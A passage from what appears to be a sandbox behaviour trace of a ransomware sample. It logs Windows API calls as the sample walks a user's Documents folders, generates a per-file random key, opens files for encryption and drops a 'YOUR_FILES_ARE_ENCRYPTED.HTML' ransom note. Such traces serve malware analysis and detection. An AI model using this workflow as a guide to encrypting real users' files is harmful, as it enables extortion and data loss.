ftLastWriteTime.dwLowDateTime=0xa83198f0, ftLastWriteTime.dwHighDateTime=0x1d7e0c9, nFileSizeHigh=0x0, nFileSizeLow=0xc3e4, dwReserved0=0x151515, dwReserved1=0x0, cFileName="JXoeufXBs.ots", cAlternateFileName="JXOEUF~1.OTS")) returned 1 [0167.002] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\JXoeufXBs.ots") returned 55 [0167.002] lstrcmpW (lpString1="JXoeufXBs.ots", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.002] PathFindExtensionW (pszPath="JXoeufXBs.ots") returned=".ots" [0167.002] lstrlenW (lpString=".ots") returned 4 [0167.002] PathFindExtensionW (pszPath="JXoeufXBs.ots") returned=".ots" [0167.002] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf687a7e0, ftCreationTime.dwHighDateTime=0x1d7e50d, ftLastAccessTime.dwLowDateTime=0xcdacac30, ftLastAccessTime.dwHighDateTime=0x1d7e61b, ftLastWriteTime.dwLowDateTime=0xcdacac30, ftLastWriteTime.dwHighDateTime=0x1d7e61b, nFileSizeHigh=0x0, nFileSizeLow=0x73ea, dwReserved0=0x151515, dwReserved1=0x0, cFileName="sIJyL8HKTPr6.ppt", cAlternateFileName="SIJYL8~1.PPT")) returned 1 [0167.002] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt") returned 58 [0167.002] lstrcmpW (lpString1="sIJyL8HKTPr6.ppt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.002] PathFindExtensionW (pszPath="sIJyL8HKTPr6.ppt") returned=".ppt" [0167.003] lstrlenW (lpString=".ppt") returned 4 [0167.003] PathFindExtensionW (pszPath="sIJyL8HKTPr6.ppt") returned=".ppt" [0167.003] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\sijyl8hktpr6.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.005] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=29674) returned 1 [0167.005] GetProcessHeap () returned 0x270000 [0167.005] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.006] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="0F") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="54") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="30") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="AD") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="71") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="72") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="54") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="95") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="1B") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="6E") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="20") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="84") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D8") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="75") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="36") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F4") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="4F") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="26") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="DB") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="96") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="51") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="3F") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="3D") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="5D") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="14") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="B4") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A2") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="DA") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E7") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="77") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="8A") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="5E") returned 2 [0167.008] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt" [0167.008] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.008] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.016] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5eba540, ftCreationTime.dwHighDateTime=0x1d7e773, ftLastAccessTime.dwLowDateTime=0x284dd9a0, ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0x284dd9a0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0x6f89, dwReserved0=0x151515, dwReserved1=0x0, cFileName="vrGluN.doc", cAlternateFileName="")) returned 1 [0167.016] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc") returned 52 [0167.016] lstrcmpW (lpString1="vrGluN.doc", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.016] PathFindExtensionW (pszPath="vrGluN.doc") returned=".doc" [0167.016] lstrlenW (lpString=".doc") returned 4 [0167.016] PathFindExtensionW (pszPath="vrGluN.doc") returned=".doc" [0167.016] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\vrglun.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.017] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=28553) returned 1 [0167.017] GetProcessHeap () returned 0x270000 [0167.017] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.018] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="FB") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="DC") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D0") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F0") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AA") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="FC") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="33") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="D6") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="DD") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="54") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="FE") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="86") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7D") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="52") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C3") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0E") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="5A") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="37") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="8C") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AC") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="1E") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="9C") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="88") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="FC") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="39") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9A") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="9F") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="3A") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C8") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="16") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="59") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="73") returned 2 [0167.020] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc" [0167.020] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.020] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.028] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5eba540, ftCreationTime.dwHighDateTime=0x1d7e773, ftLastAccessTime.dwLowDateTime=0x284dd9a0, ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0x284dd9a0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0x6f89, dwReserved0=0x151515, dwReserved1=0x0, cFileName="vrGluN.doc", cAlternateFileName="")) returned 0 [0167.028] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.029] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0167.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.029] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.031] CloseHandle (hObject=0x5ac) returned 1 [0167.032] GetProcessHeap () returned 0x270000 [0167.032] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.032] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0167.033] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music") returned 42 [0167.033] GetProcessHeap () returned 0x270000 [0167.033] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.033] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music" [0167.033] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music\\*" [0167.033] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5eba540, ftCreationTime.dwHighDateTime=0x1d7e773, ftLastAccessTime.dwLowDateTime=0x284dd9a0, ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0x284dd9a0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0x6f89, dwReserved0=0x151515, dwReserved1=0x0, cFileName="vrGluN.doc", cAlternateFileName="ꅨݏ")) returned 0xffffffff [0167.033] GetProcessHeap () returned 0x270000 [0167.034] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.034] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0167.034] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures") returned 45 [0167.034] GetProcessHeap () returned 0x270000 [0167.034] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.034] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures" [0167.034] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures\\*" [0167.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5eba540, ftCreationTime.dwHighDateTime=0x1d7e773, ftLastAccessTime.dwLowDateTime=0x284dd9a0, ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0x284dd9a0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0x6f89, dwReserved0=0x151515, dwReserved1=0x0, cFileName="vrGluN.doc", cAlternateFileName="ꅨݏ")) returned 0xffffffff [0167.034] GetProcessHeap () returned 0x270000 [0167.035] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.035] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0167.035] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos") returned 43 [0167.035] GetProcessHeap () returned 0x270000 [0167.035] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.035] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos" [0167.035] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos\\*" [0167.035] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5eba540, ftCreationTime.dwHighDateTime=0x1d7e773, ftLastAccessTime.dwLowDateTime=0x284dd9a0, ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0x284dd9a0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0x6f89, dwReserved0=0x151515, dwReserved1=0x0, cFileName="vrGluN.doc", cAlternateFileName="ꅨݏ")) returned 0xffffffff [0167.035] GetProcessHeap () returned 0x270000 [0167.036] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.036] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb60bd110, ftCreationTime.dwHighDateTime=0x1d76802, ftLastAccessTime.dwLowDateTime=0x9842b860, ftLastAccessTime.dwHighDateTime=0x1d7a056, ftLastWriteTime.dwLowDateTime=0x9842b860, ftLastWriteTime.dwHighDateTime=0x1d7a056, nFileSizeHigh=0x0, nFileSizeLow=0x16d12, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ohf p64bSEpu.pptx", cAlternateFileName="OHFP64~1.PPT")) returned 1 [0167.036] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx") returned 51 [0167.036] lstrcmpW (lpString1="ohf p64bSEpu.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.036] PathFindExtensionW (pszPath="ohf p64bSEpu.pptx") returned=".pptx" [0167.036] lstrlenW (lpString=".pptx") returned 5 [0167.036] PathFindExtensionW (pszPath="ohf p64bSEpu.pptx") returned=".pptx" [0167.036] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\ohf p64bsepu.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.037] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=93458) returned 1 [0167.037] GetProcessHeap () returned 0x270000 [0167.037] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.038] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="79") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="49") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="36") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="C4") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="9B") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="AC") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="08") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="DD") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="8A") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C8") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="8E") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="CC") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="14") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="66") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="27") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="EA") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="EA") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="B4") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="B6") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="37") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="1F") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="82") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="4C") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="AC") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="F7") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="54") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="C3") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="57") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="A6") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="ED") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="AF") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="38") returned 2 [0167.040] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx" [0167.040] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.040] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.174] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3b8c60, ftCreationTime.dwHighDateTime=0x1d78b30, ftLastAccessTime.dwLowDateTime=0xe326e8d0, ftLastAccessTime.dwHighDateTime=0x1d79325, ftLastWriteTime.dwLowDateTime=0xe326e8d0, ftLastWriteTime.dwHighDateTime=0x1d79325, nFileSizeHigh=0x0, nFileSizeLow=0x14cfb, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="otlV MF8xoszJZMG1k_q.docx", cAlternateFileName="OTLVMF~1.DOC")) returned 1 [0167.174] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx") returned 59 [0167.174] lstrcmpW (lpString1="otlV MF8xoszJZMG1k_q.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.174] PathFindExtensionW (pszPath="otlV MF8xoszJZMG1k_q.docx") returned=".docx" [0167.174] lstrlenW (lpString=".docx") returned 5 [0167.174] PathFindExtensionW (pszPath="otlV 